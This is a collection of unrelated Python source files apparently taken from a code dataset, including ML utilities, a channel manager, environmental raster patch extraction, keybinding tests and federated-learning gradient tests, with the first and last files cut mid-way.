#关于这个函数的for循环的嵌套次数,Y标签集中,有几个标签就嵌套几层。(y1,y2,...,yq)
:return: 返回的是q维的标签集的所有组合情况
"""
"""
randLabels=[]
for i in range(2):
randLabels.append([i])
return randLabels
"""
randLabels = []
for i in range(2 ** len):
randLabel = np.zeros(shape=len)
for j in range(len):
randLabel[len - j - 1] = i % 2
i = i // 2
if i == 0:
break
print(randLabel)
randLabels.append(randLabel)
np.save("./basic_rand_Labels.npy", np.array(randLabels))
def supported_rand_labels(train_label):
"""
这是个辅助函数,用来生成support_rand_Labels
"""
"""
randLabels=[]
for i in range(2):
randLabels.append([i])
return randLabels
"""
# for _, y in train_iter:
labels = train_label.tolist()
label_set = []
for label in labels:
if label in label_set:
continue
else:
label_set.append(label)
randLables = np.array(label_set)
print(label_set)
np.save("./supported_rand_labels.npy", randLables)
print("finish")
def generate_rand_Labels(mode):
if mode == "supported":
randLabels = np.load("./data/rand_labels/supported_rand_labels.npy")
randLabels = randLabels.tolist()
return randLabels
elif mode == "basic":
randLabels = np.load("./data/rand_labels/basic_rand_Labels.npy")
randLabels = randLabels.tolist()
return randLabels
def Z(dataSet, d, q, Lambda, randLabels): # 对于某一个样本的Z
"""
:param dataSet: 某一个样本的特征集
:param d: 样本的维度,即特征的个数
:param q: 标签集的个数
:param Lambda: Lambda是一个1*K维向量
:return: 归一化范数,以及所有标签集组合的对应f_k
"""
Z = 0
for i in range(len(randLabels)):
fk = f_k(dataSet, randLabels[i], d, q)
temp_sum = torch.exp((Lambda * fk).sum())
Z = Z + temp_sum
return Z
def load_data(train_data_path, train_label_path, test_data_path, test_label_path, batch_size):
# 训练集的处理
train_data = np.load(train_data_path)
train_data = train_data[:, :]
train_label = np.load(train_label_path)
train_label = train_label[:, :]
test_data = np.load(test_data_path)
test_data = test_data[:, :]
test_label = np.load(test_label_path)
test_target = test_label[:, :]
train_target = torch.tensor(train_label, dtype=torch.float, requires_grad=True)
test_target = torch.tensor(test_label, dtype=torch.float, requires_grad=True)
# 主成分降维
pca = PCA(n_components=5) # 保留5个主成分
train_data = torch.tensor(pca.fit_transform(train_data), requires_grad=True)
test_data = torch.tensor((pca.fit_transform(test_data)), requires_grad=True)
d = len(train_data[0])
q = len(train_target[0])
K = int(d * q + 4 * comb(q, 2))
thegma = 2 ** (1) # 参数寻优,-6,-5,-4,-3,-2,-1,0,1,2,3,4,5,6
# 训练数据集
dataset = Data.TensorDataset(train_data, train_target)
# 测试集的处理
test_data = Data.TensorDataset(test_data, test_target)
# test_data = Data.TensorDataset(torch.tensor(test_data, requires_grad=True))
# 随机读取小批量
train_iter = Data.DataLoader(dataset, batch_size, shuffle=True)
test_iter = Data.DataLoader(test_data, batch_size, shuffle=False)
return train_iter, test_iter, K, thegma, d, q
|
the-stack_106_23820 | # =======================================================================
#
# Copyright (C) 2018, Hisilicon Technologies Co., Ltd. All Rights Reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1 Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2 Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3 Neither the names of the copyright holders nor the names of the
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# =======================================================================
#
"""presenter channel manager module"""
import logging
import threading
# max support 10 channels
MAX_CHANNEL_NUM = 10
# when a channel have receive data,
# the active status will last 3 seconds
ACTIVE_LAST_TIME = 3
class ChannelResource():
"""every channel has a ChannelResource object, contains a ChannelHandler object
and a socket fileno. it corresponding to the ChannelFd one by one
"""
def __init__(self, handler, socket=None):
self.handler = handler
self.socket = socket
class ChannelFd():
"""every channel has a ChannelFd object, contains a ChannelHandler
object and channel name. It corresponds to the ChannelResource one by one
"""
def __init__(self, channel_name, handler):
self.channel_name = channel_name
self.handler = handler
class Channel():
"""record user register channels
self.image: if channel type is image, save the image here
"""
def __init__(self, channel_name):
self.channel_name = channel_name
self.image = None
self.rectangle_list = None
class ChannelManager():
"""manage all the api about channel
__instance: ensure it is a single instance
_channel_resources: a dict
key: channel name
value: a ChannelResource() object.
_channel_fds: a dict
key: socket fileno
value: a ChannelFd() object.
_channel_list: a list, member is a Channel() object."""
__instance = None
channel_resources = {}
channel_fds = {}
channel_list = []
channel_resource_lock = threading.Lock()
channel_fds_lock = threading.Lock()
channel_lock = threading.Lock()
err_code_ok = 0
err_code_too_many_channel = 1
err_code_repeat_channel = 2
def __init__(self, channel_list=None):
"""init func"""
def __new__(cls, channel_list=None):
"""ensure only a single instance created. """
if cls.__instance is None:
cls.__instance = object.__new__(cls)
# default create 2 channels: image and video
# if channel_list is not None and isinstance(channel_list, list):
# for i in channel_list:
# cls.channel_list.append(Channel(channel_name=i))
# logging.info("register channel %s", i)
return cls.__instance
def _register_channel_fd(self, sock_fileno, channel_name):
"""Internal func, create a ChannelFd object"""
if self.channel_fds.get(sock_fileno):
del self.channel_fds[sock_fileno]
handler = self.channel_resources[channel_name].handler
self.channel_fds[sock_fileno] = ChannelFd(channel_name, handler)
def create_channel_resource(self, channel_name,
channel_fd,
media_type,
handler):
"""create a ChannelResource object which contains all the resources
binding a channel.
channel_name: channel name.
channel_fd: socket fileno binding the channel.
media_type: support image or video.
handler: an channel handler process image data.
"""
with self.channel_resource_lock:
log_info = "create channel resource,"
log_info += " channel_name:%s, channel_fd:%u, media_type:%s"
logging.info(log_info, channel_name, channel_fd, media_type)
self.channel_resources[channel_name] = \
ChannelResource(handler=handler, socket=channel_fd)
self._register_channel_fd(channel_fd, channel_name)
def _clean_channel_resource(self, channel_name):
"""Internal func, clean channel resource by channel name"""
if self.channel_resources.get(channel_name):
self.channel_resources[channel_name].handler.close_thread()
self.channel_resources[channel_name].handler.web_event.set()
self.channel_resources[channel_name].handler.image_event.set()
del self.channel_resources[channel_name]
logging.info("clean channel: %s's resource", channel_name)
def clean_channel_resource_by_fd(self, sock_fileno):
"""
clean channel resource by socket fileno
sock_fileno: socket fileno which binding to an channel
"""
with self.channel_fds_lock:
with self.channel_resource_lock:
if self.channel_fds.get(sock_fileno):
self._clean_channel_resource(
self.channel_fds[sock_fileno].channel_name)
del self.channel_fds[sock_fileno]
def clean_channel_resource_by_name(self, channel_name):
"""clean channel resource by channel_name
channel_name: channel name"""
if self.channel_resources.get(channel_name):
self.clean_channel_resource_by_fd(
self.channel_resources[channel_name].socket)
def get_channel_handler_by_fd(self, sock_fileno):
"""get channel handler by socket fileno"""
with self.channel_fds_lock:
if self.channel_fds.get(sock_fileno):
return self.channel_fds[sock_fileno].handler
return None
def is_channel_busy(self, channel_name):
"""check if channel is busy """
with self.channel_resource_lock:
if self.channel_resources.get(channel_name):
return True
return False
def close_all_thread(self):
"""if a channel process video type, it will create a thread.
this func can close the thread.
"""
with self.channel_resource_lock:
for channel_name in self.channel_resources:
self.channel_resources[channel_name].handler.close_thread()
def get_channel_handler_by_name(self, channel_name):
"""
get the channel handlerby channel name
"""
with self.channel_resource_lock:
if self.channel_resources.get(channel_name):
return self.channel_resources[channel_name].handler
return None
def list_channels(self):
"""
return all the channel name and the status
status is indicating active state or not
"""
with self.channel_lock:
return [{'status': self.is_channel_busy(i.channel_name),
'name': i.channel_name} for i in self.channel_list]
def register_one_channel(self, channel_name):
"""
register a channel path, user create a channel via browser
"""
with self.channel_lock:
if len(self.channel_list) >= MAX_CHANNEL_NUM:
logging.info("register channel: %s fail, \
exceed max number 10.", channel_name)
return self.err_code_too_many_channel
for i in range(len(self.channel_list)):
if self.channel_list[i].channel_name == channel_name:
logging.info("register channel: %s fail, \
already exist.", channel_name)
return self.err_code_repeat_channel
self.channel_list.append(Channel(channel_name=channel_name))
logging.info("register channel: %s", channel_name)
return self.err_code_ok
def unregister_one_channel(self, channel_name):
"""
unregister a channel path, user delete a channel via browser
"""
with self.channel_lock:
for i in range(len(self.channel_list)):
if self.channel_list[i].channel_name == channel_name:
self.clean_channel_resource_by_name(channel_name)
logging.info("unregister channel: %s", channel_name)
del self.channel_list[i]
break
def is_channel_exist(self, channel_name):
"""
Check if a channel is exist
True: exist
False: not exist
"""
with self.channel_lock:
for i in range(len(self.channel_list)):
if self.channel_list[i].channel_name == channel_name:
return True
return False
def save_channel_image(self, channel_name, image_data, rectangle_list):
"""
when a channel bounding to image type,
server will permanent hold an image for it.
this func save a image in memory
"""
with self.channel_lock:
for i in range(len(self.channel_list)):
if self.channel_list[i].channel_name == channel_name:
self.channel_list[i].image = image_data
self.channel_list[i].rectangle_list = rectangle_list
break
def get_channel_image(self, channel_name):
"""
when a channel bounding to image type,
server will permanent hold an image for it.
this func get the image
"""
with self.channel_lock:
for i in range(len(self.channel_list)):
if self.channel_list[i].channel_name == channel_name:
return self.channel_list[i].image
# channel not exist
return None
def get_channel_image_with_rectangle(self, channel_name):
"""
A new method for display server,
return the image and rectangle list
"""
with self.channel_lock:
for i in range(len(self.channel_list)):
if self.channel_list[i].channel_name == channel_name:
return (self.channel_list[i].image, self.channel_list[i].rectangle_list)
return (None, None)
def clean_channel_image(self, channel_name):
"""
when a channel bounding to image type,
server will permanent hold an image for it.
this func clean the image
"""
with self.channel_lock:
for i in range(len(self.channel_list)):
if self.channel_list[i].channel_name == channel_name:
self.channel_list[i].image = None
break
|
the-stack_106_23822 | import json
import logging
from pathlib import Path
from flow_py_sdk.cadence import Address
from flow_py_sdk.signer import InMemorySigner, HashAlgo, SignAlgo
log = logging.getLogger(__name__)
class Config(object):
def __init__(self, config_location: Path) -> None:
super().__init__()
self.access_node_host: str = "localhost"
self.access_node_port: int = 3569
self.service_account_key_id: int = 0
# noinspection PyBroadException
try:
with open(config_location) as json_file:
data = json.load(json_file)
self.service_account_address = Address.from_hex(
data["accounts"]["emulator-account"]["address"]
)
self.service_account_signer = InMemorySigner(
hash_algo=HashAlgo.from_string(
data["accounts"]["emulator-account"]["hashAlgorithm"]
),
sign_algo=SignAlgo.from_string(
data["accounts"]["emulator-account"]["sigAlgorithm"]
),
private_key_hex=data["accounts"]["emulator-account"]["keys"],
)
except Exception:
log.warning(
f"Cannot open {config_location}, using default settings",
exc_info=True,
stack_info=True,
)
|
the-stack_106_23823 | import torch as th
from torch.autograd import Function
def batch2tensor(batch_adj, batch_feat, node_per_pool_graph):
"""
transform a batched graph to batched adjacency tensor and node feature tensor
"""
batch_size = int(batch_adj.size()[0] / node_per_pool_graph)
adj_list = []
feat_list = []
for i in range(batch_size):
start = i * node_per_pool_graph
end = (i + 1) * node_per_pool_graph
adj_list.append(batch_adj[start:end, start:end])
feat_list.append(batch_feat[start:end, :])
adj_list = list(map(lambda x: th.unsqueeze(x, 0), adj_list))
feat_list = list(map(lambda x: th.unsqueeze(x, 0), feat_list))
adj = th.cat(adj_list, dim=0)
feat = th.cat(feat_list, dim=0)
return feat, adj
def masked_softmax(matrix, mask, dim=-1, memory_efficient=True,
mask_fill_value=-1e32):
'''
masked_softmax for dgl batch graph
code snippet contributed by AllenNLP (https://github.com/allenai/allennlp)
'''
if mask is None:
result = th.nn.functional.softmax(matrix, dim=dim)
else:
mask = mask.float()
while mask.dim() < matrix.dim():
mask = mask.unsqueeze(1)
if not memory_efficient:
result = th.nn.functional.softmax(matrix * mask, dim=dim)
result = result * mask
result = result / (result.sum(dim=dim, keepdim=True) + 1e-13)
else:
masked_matrix = matrix.masked_fill((1 - mask).byte(),
mask_fill_value)
result = th.nn.functional.softmax(masked_matrix, dim=dim)
return result
|
the-stack_106_23824 | """
"
" Author: Maximilien Servajean - mservajean
" Mail: [email protected]
" Date: 04/01/2019
"
" Description: The code to extract environmental tensors and environmental vectors given some environmental rasters.
"
"""
import numpy as np
import rasterio
import re
import warnings
import matplotlib.pyplot as plt
# metadata used to setup some rasters
raster_metadata = {
'bdticm': {'min_val': 0, 'max_val': 112467, 'nan': -2147483647, 'new_nan': -1, 'mu': 2579, 'sigma': 3058},
'bldfie': {'min_val': 93, 'max_val': 1828, 'nan': -32768, 'new_nan': 92, 'mu': 1372, 'sigma': 137},
'cecsol': {'min_val': 0, 'max_val': 385, 'nan': -32768, 'new_nan': -1, 'mu': 20, 'sigma': 8},
'clyppt': {'min_val': 0, 'max_val': 81, 'nan': -32768, 'new_nan': -1, 'mu': 22, 'sigma': 8},
'orcdrc': {'min_val': 0, 'max_val': 524, 'nan': -32768, 'new_nan': -1, 'mu': 24, 'sigma': 21},
'phihox': {'min_val': 32, 'max_val': 98, 'nan': -32768, 'new_nan': 31, 'mu': 64, 'sigma': 11},
'sltppt': {'min_val': 0, 'max_val': 86, 'nan': -32768, 'new_nan': -1, 'mu': 37, 'sigma': 11},
'sndppt': {'min_val': 0, 'max_val': 99, 'nan': -32768, 'new_nan': -1, 'mu': 42, 'sigma': 14},
'bio_1': {'min_val': -116, 'max_val': 259, 'nan': -2147483647, 'new_nan': -117, 'mu': 101, 'sigma': 58},
'bio_2': {'min_val': -53, 'max_val': 361, 'nan': -2147483647, 'new_nan': -54, 'mu': 131, 'sigma': 28},
'bio_3': {'min_val': 19, 'max_val': 69, 'nan': -2147483647, 'new_nan': 18, 'mu': 36, 'sigma': 8},
'bio_4': {'min_val': 1624, 'max_val': 13302, 'nan': -2147483647, 'new_nan': 1623, 'mu': 8267, 'sigma': 2152},
'bio_5': {'min_val': -25, 'max_val': 457, 'nan': -2147483647, 'new_nan': -26, 'mu': 289, 'sigma': 48},
'bio_6': {'min_val': -276, 'max_val': 183, 'nan': -2147483647, 'new_nan': -277, 'mu': -78, 'sigma': 83},
'bio_7': {'min_val': 117, 'max_val': 515, 'nan': -2147483647, 'new_nan': 116, 'mu': 367, 'sigma': 72},
'bio_8': {'min_val': -169, 'max_val': 332, 'nan': -2147483647, 'new_nan': -170, 'mu': 149, 'sigma': 82},
'bio_9': {'min_val': -181, 'max_val': 331, 'nan': -2147483647, 'new_nan': -182, 'mu': 54, 'sigma': 114},
'bio_10': {'min_val': -53, 'max_val': 361, 'nan': -2147483647, 'new_nan': -54, 'mu': 205, 'sigma': 47},
'bio_11': {'min_val': -186, 'max_val': 220, 'nan': -2147483647, 'new_nan': -187, 'mu': -7, 'sigma': 80},
'bio_12': {'min_val': -35, 'max_val': 3385, 'nan': -2147483647, 'new_nan': -36, 'mu': 746, 'sigma': 383},
'bio_13': {'min_val': 7, 'max_val': 570, 'nan': -2147483647, 'new_nan': 6, 'mu': 98, 'sigma': 47},
'bio_14': {'min_val': 0, 'max_val': 184, 'nan': -2147483647, 'new_nan': -1, 'mu': 34, 'sigma': 26},
'bio_15': {'min_val': 5, 'max_val': 140, 'nan': -2147483647, 'new_nan': 4, 'mu': 38, 'sigma': 23},
'bio_16': {'min_val': 19, 'max_val': 1546, 'nan': -2147483647, 'new_nan': 18, 'mu': 265, 'sigma': 132},
'bio_17': {'min_val': 0, 'max_val': 612, 'nan': -2147483647, 'new_nan': -1, 'mu': 117, 'sigma': 84},
'bio_18': {'min_val': 1, 'max_val': 777, 'nan': -2147483647, 'new_nan': 0, 'mu': 213, 'sigma': 107},
'bio_19': {'min_val': 5, 'max_val': 1485, 'nan': -2147483647, 'new_nan': 4, 'mu': 163, 'sigma': 137},
}
class Raster(object):
"""
Raster is dedicated to a single raster management...
"""
def __init__(self, path, country='FR', normalized=False, transform=None, size=256, nan=None, new_nan=None, mu=0,
sigma=1, **kw):
"""
Loads a tiff file describing an environmental raster into a numpy array and...
:type new_nan:
:param path: the path of the raster (the directory)
:param nan: the value to use when NaN number are present. If False, then default values will be used
:param normalized: if True the raster will be normalized (minus the mean and divided by std)
:param transform: if a function is given, it will be applied on each patch.
:param size: the size of a patch (size x size)
"""
self.path = path
self.no_data = new_nan
self.normalized = normalized
self.transform = transform
self.size = size
path = re.sub(r'/\/+/', '/', path)
self.name = path.split('/')[-1] if path[-1] != '/' else path.split('/')[-2]
print(path + '/' + self.name + '_' + country + '.tif')
# src.meta
# to avoid the annoying corresponding warning, temporary warning disabling...
warnings.filterwarnings("ignore")
src = rasterio.open(path + '/' + self.name + '_' + country + '.tif', nodata=nan)
warnings.filterwarnings("default")
if src.meta['crs'] is None:
with open(path + '/' + 'GeoMetaData.csv') as f:
metadata = f.read()
m_split = metadata.split('\n')[1].split(';')
# loading file data
self.x_min = float(m_split[1])
self.y_min = float(m_split[2])
self.x_resolution = float(m_split[5])
self.y_resolution = float(m_split[6])
self.n_rows = int(m_split[3])
self.n_cols = int(m_split[4])
else:
self.x_min = src.bounds.left
self.y_min = src.bounds.bottom
self.x_resolution = src.res[0]
self.y_resolution = src.res[1]
self.n_rows = src.height
self.n_cols = src.width
print(self.x_min, self.y_min, self.x_resolution, self.y_resolution, self.n_rows, self.n_cols)
# some tiff do not contain geo data (stored in the file GeoMetaData)
# loading the raster
self.raster = np.squeeze(src.read())
src.close()
# value bellow min_value are considered incorrect and therefore no_data
self.raster[self.raster == nan] = new_nan
self.raster[np.isnan(self.raster)] = new_nan
if normalized:
# normalizing the whole raster given available data (therefore avoiding no_data)...
selected_cell = self.raster != nan
self.raster[selected_cell] = (self.raster[selected_cell] - mu) / sigma
# setting the shape of the raster
self.shape = self.raster.shape
def _get_patch(self, item):
"""
Avoid using this method directly
:param item: the GPS position (latitude, longitude)
:return: a patch
"""
row_num = int(self.n_rows - (item[0] - self.y_min) / self.y_resolution)
col_num = int((item[1] - self.x_min) / self.x_resolution)
# environmental vector
if self.size == 1:
patch = self.raster[row_num, col_num].astype(np.float)
else:
half_size = int(self.size/2)
patch = self.raster[
row_num-half_size:row_num+half_size,
col_num - half_size:col_num+half_size
].astype(np.float)
patch = patch[np.newaxis]
return patch
def __len__(self):
"""
:return: the depth of the tensor/vector...
"""
return 1
def __getitem__(self, item):
"""
The method to use to retrieve a patch.
:param item: GPS position (latitude, longitude)
:return: the extracted patch with eventually some transformations
"""
# item is a tuple of (latitude, longitude)
patch = self._get_patch(item)
if self.transform:
patch = self.transform(patch)
return patch
class PatchExtractor(object):
"""
PatchExtractor enables the extraction of an environmental tensor from multiple rasters given a GPS
position.
"""
def __init__(self, root_path, size=256, verbose=False, resolution=1.):
self.root_path = root_path
self.size = size
self.verbose = verbose
self.resolution = resolution
self.rasters_fr = []
self.rasters_us = []
def add_all(self, normalized=False, transform=None):
"""
Add all variables (rasters) available at root_path
:param normalized: if True, each raster will be normalized
:param transform: a function to apply on each patch
"""
for key in sorted(raster_metadata.keys()):
if 'ignore' not in raster_metadata[key]:
self.append(key, normalized=normalized, transform=transform)
def append(self, raster_name, **kwargs):
"""
This method append a new raster given its name
:param raster_name:
:param kwargs: nan, normalized, transform
"""
# you may want to add rasters one by one if specific configuration are required on a per raster
# basis
print('Adding: ' + raster_name)
params = {**raster_metadata[raster_name]}
for k in kwargs.keys():
if kwargs[k] != 'default':
params[k] = kwargs[k]
r_us = Raster(self.root_path + '/' + raster_name, 'USA', size=self.size, **params)
r_fr = Raster(self.root_path + '/' + raster_name, 'FR', size=self.size, **params)
self.rasters_us.append(r_us)
self.rasters_fr.append(r_fr)
def clean(self):
"""
Remove all rasters from the extractor.
"""
print('Removing all rasters...')
self.rasters_fr = []
self.rasters_us = []
def __repr__(self):
return self.__str__()
def __str__(self):
str_ = ''
def raster_str(r):
result = ''
result += '-' * 50 + '\n'
result += 'title: ' + r.name + '\n'
result += '\t x_min: ' + str(r.x_min) + '\n'
result += '\t y_min: ' + str(r.y_min) + '\n'
result += '\t x_resolution: ' + str(r.x_resolution) + '\n'
result += '\t y_resolution: ' + str(r.y_resolution) + '\n'
result += '\t n_rows: ' + str(r.n_rows) + '\n'
result += '\t n_cols: ' + str(r.n_cols) + '\n'
return result
for r in self.rasters_fr:
str_ += raster_str(r)
for r in self.rasters_us:
str_ += raster_str(r)
return str_
def __getitem__(self, item):
"""
:param item: the GPS location (latitude, longitude)
:return: return the environmental tensor or vector (size>1 or size=1)
"""
rasters = self._raster(item)
if len(rasters) > 1:
return np.concatenate([r.__getitem__(item) for r in rasters])
else:
return np.array([rasters[0].__getitem__(item)])
def __len__(self):
"""
:return: the number of variables (not the size of the tensor when some variables have a one hot encoding
representation)
"""
return len(self.rasters_fr)
def _raster(self, item):
return self.rasters_fr if item[1] > -10. else self.rasters_us
def plot(self, item, return_fig=False, style='fivethirtyeight', nb_cols=5, alpha=1.):
"""
Plot an environmental tensor (size > 1)...
:param alpha:
:param nb_cols:
:param item: the GPS location (latitude, longitude)
:param return_fig: if True, the matplotlib fig will be returned, if False, it will be displayed
:param style: style of the chart
"""
if self.size > 1:
rasters = self._raster(item)
with plt.style.context(style):
metadata = [
(r.name,
[
item[1] - self.size // 2 * r.x_resolution,
item[1] + self.size // 2 * r.x_resolution,
item[0] - self.size // 2 * r.y_resolution,
item[0] + self.size // 2 * r.y_resolution]
) for r in rasters
]
# metadata are the name of the variable and the bounding box in latitude-longitude coordinates
# retrieve the patch... Eventually disabling the one hot encoding variables
patch = self.__getitem__(item)
# computing number of rows and columns...
nb_rows = (patch.shape[0] + (nb_cols-1)) // nb_cols
fig = plt.figure(figsize=(nb_cols * 6.4 * self.resolution, nb_rows * 4.8 * self.resolution))
for k, i in zip(metadata, range(patch.shape[0])):
plt.subplot(nb_rows, nb_cols, i + 1)
plt.title(k[0], fontsize=20)
p = np.squeeze(patch[i])
plt.imshow(p, extent=k[1], aspect='auto')
plt.colorbar()
fig.tight_layout()
fig.patch.set_alpha(alpha)
if return_fig:
return fig
else:
fig.show()
plt.close(fig)
else:
raise ValueError('Plot works only for tensors: size must be > 1...')
|
the-stack_106_23825 | import pytest
from keybind import KeyBinder, configure_logging
def test_basic(xlib_mock):
configure_logging()
xlib_mock.register_events([
(1, 'K'),
(1, 'J'),
(1, 'pass'), # captured, no handler
(0, 'pass'), # non captured
])
pressed = []
with pytest.raises(IndexError):
KeyBinder.activate({
'Ctrl-K': lambda: pressed.append('Ctrl-K'),
'J': lambda: pressed.append('J'),
10: lambda: pressed.append('10'),
})
# Try bogus grab key.
xlib_mock.register_error('errr', 'ev')
with pytest.raises(IndexError):
KeyBinder.activate({
'bogus': lambda: None,
})
# Try sniffing.
with pytest.raises(IndexError):
KeyBinder.activate()
def test_thread(xlib_mock):
KeyBinder.activate({
'J': lambda: None,
}, run_thread=True)
@pytest.mark.parametrize("key_input, expected_result",
[
("J", ([], "J")),
("Ctrl-J", (["Ctrl"], "J")),
("Ctrl-Alt-J", (["Ctrl", "Alt"], "J")),
("", ([], "")),
]
)
def test_parse_key_valid_input(key_input, expected_result, xlib_mock):
# GIVEN valid input describing a key or key combination
# WHEN the input is parsed
binder = KeyBinder()
# THEN the expected result is returned
assert binder._parse_key(key_input) == expected_result
def test_parse_key_invalid_input(xlib_mock):
# GIVEN a list of valid input types and input that is not one of those
valid_input_types = [str, int]
invalid_input = ["Ctrl", "J"]
assert type(invalid_input) not in valid_input_types
# WHEN the input gets parsed
binder = KeyBinder()
# THEN a TypeError is raised
with pytest.raises(TypeError):
binder._parse_key(invalid_input)
|
the-stack_106_23826 | from sys import argv, stderr
from pickle import dump
from copy import copy
if len(argv) != 4:
stderr.write('USAGE: %s infobox_categories redirects ofile\n' % argv[0])
exit(1)
info_categories = {w:c for w,c in [l.split('\t') for l in open(argv[1]).read().split('\n') if l != '']}
redirects = {w:r for w,r in [l.split('\t') for l in open(argv[2]).read().split('\n') if l != '']}
ofile = open(argv[3],'wb')
for w, r in redirects.items():
if not w in info_categories:
if r in info_categories:
info_categories[w] = info_categories[r]
gazetteer = {}
for w,c in info_categories.items():
k = w
if w[-1] == ')' and w.count(' (') == 1:
ind = w.find(' (')
k = w[:ind]
if not k in gazetteer:
gazetteer[k] = set()
gazetteer[k].add(c)
gazetteer_lc = copy(gazetteer)
for w,c in gazetteer.items():
if not w.lower() in gazetteer:
gazetteer_lc[w.lower()] = c
dump(gazetteer_lc,ofile)
|
the-stack_106_23830 | #
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import numpy as np
from arch.api.session import init
from federatedml.ftl.encryption import encryption
from federatedml.ftl.test.mock_models import MockAutoencoder
from federatedml.ftl.test.whitebox_plain_gradients_test import run_one_party_msg_exchange
from federatedml.secureprotol.encrypt import PaillierEncrypt
class TestEncryptedGradients(unittest.TestCase):
def setUp(self):
paillierEncrypt = PaillierEncrypt()
paillierEncrypt.generate_key()
self.public_key = paillierEncrypt.get_public_key()
self.private_key = paillierEncrypt.get_privacy_key()
def test_party_b_gradient_checking_test(self):
U_A = np.array([[1, 2, 3, 4, 5],
[4, 5, 6, 7, 8],
[7, 8, 9, 10, 11],
[4, 5, 6, 7, 8]])
U_B = np.array([[4, 2, 3, 1, 2],
[6, 5, 1, 4, 5],
[7, 4, 1, 9, 10],
[6, 5, 1, 4, 5]])
y = np.array([[1], [-1], [1], [-1]])
overlap_indexes = [1, 2]
non_overlap_indexes = [0, 3]
Wh = np.ones((4, U_A.shape[1]))
bh = np.zeros(U_A.shape[1])
autoencoderA = MockAutoencoder(0)
autoencoderA.build(U_A.shape[1], Wh, bh)
autoencoderB = MockAutoencoder(1)
autoencoderB.build(U_B.shape[1], Wh, bh)
partyA, partyB = run_one_party_msg_exchange(autoencoderA, autoencoderB, U_A, U_B, y, overlap_indexes,
non_overlap_indexes, self.public_key, self.private_key, True)
loss_grads_B_1 = partyB.get_loss_grads()
loss1 = partyA.send_loss()
U_B_prime = np.array([[4, 2, 3, 1, 2],
[6, 5, 1.001, 4, 5],
[7, 4, 1, 9, 10],
[6, 5, 1, 4, 5]])
partyA, partyB = run_one_party_msg_exchange(autoencoderA, autoencoderB, U_A, U_B_prime, y, overlap_indexes,
non_overlap_indexes, self.public_key, self.private_key, True)
loss_grads_B_2 = partyB.get_loss_grads()
loss2 = partyA.send_loss()
loss_grads_B_1 = np.array(encryption.decrypt_matrix(self.private_key, loss_grads_B_1))
loss_grads_B_2 = np.array(encryption.decrypt_matrix(self.private_key, loss_grads_B_2))
loss1 = encryption.decrypt(self.private_key, loss1)
loss2 = encryption.decrypt(self.private_key, loss2)
grad_approx = (loss2 - loss1) / 0.001
grad_real = loss_grads_B_1[0, 2]
grad_diff = np.abs(grad_approx - grad_real)
assert grad_diff < 0.001
def test_party_a_gradient_checking_test(self):
U_A = np.array([[1, 2, 3, 4, 5],
[4, 5, 6, 7, 8],
[7, 8, 9, 10, 11],
[4, 5, 6, 7, 8]])
U_B = np.array([[4, 2, 3, 1, 2],
[6, 5, 1, 4, 5],
[7, 4, 1, 9, 10],
[6, 5, 1, 4, 5]])
y = np.array([[1], [-1], [1], [-1]])
overlap_indexes = [1, 2]
non_overlap_indexes = [0, 3]
Wh = np.ones((4, U_A.shape[1]))
bh = np.zeros(U_A.shape[1])
autoencoderA = MockAutoencoder(0)
autoencoderA.build(U_A.shape[1], Wh, bh)
autoencoderB = MockAutoencoder(1)
autoencoderB.build(U_B.shape[1], Wh, bh)
partyA, _ = run_one_party_msg_exchange(autoencoderA, autoencoderB, U_A, U_B, y, overlap_indexes,
non_overlap_indexes, self.public_key, self.private_key, True)
loss_grads_A_1 = partyA.get_loss_grads()
loss1 = partyA.send_loss()
U_A_prime = np.array([[1, 2, 3, 4, 5],
[4, 5.001, 6, 7, 8],
[7, 8, 9, 10, 11],
[4, 5, 6, 7, 8]])
partyA, _ = run_one_party_msg_exchange(autoencoderA, autoencoderB, U_A_prime, U_B, y, overlap_indexes,
non_overlap_indexes, self.public_key, self.private_key, True)
loss_grads_A_2 = partyA.get_loss_grads()
loss2 = partyA.send_loss()
loss_grads_A_1 = np.array(encryption.decrypt_matrix(self.private_key, loss_grads_A_1))
loss_grads_A_2 = np.array(encryption.decrypt_matrix(self.private_key, loss_grads_A_2))
loss1 = encryption.decrypt(self.private_key, loss1)
loss2 = encryption.decrypt(self.private_key, loss2)
grad_approx = (loss2 - loss1) / 0.001
grad_real = loss_grads_A_1[1, 1]
grad_diff = np.abs(grad_approx - grad_real)
assert grad_diff < 0.001
if __name__ == '__main__':
init()
unittest.main()
|
the-stack_106_23831 | import tensorflow as tf
from .configuration import get_defaults
from .tfrecords_utils import read_tfrecords
from . import utils
def load_image(im_id, image_size, image_folder, image_format):
"""Resolve the correct image path from the given arguments.
Args:
im_id: image id saved in the tfrecords
image_size: integer specifying the square size to resize the image to
image_folder: image folder path
image_format: Used to resolve the correct image path and format
Returns:
The loaded image as a 3D Tensor
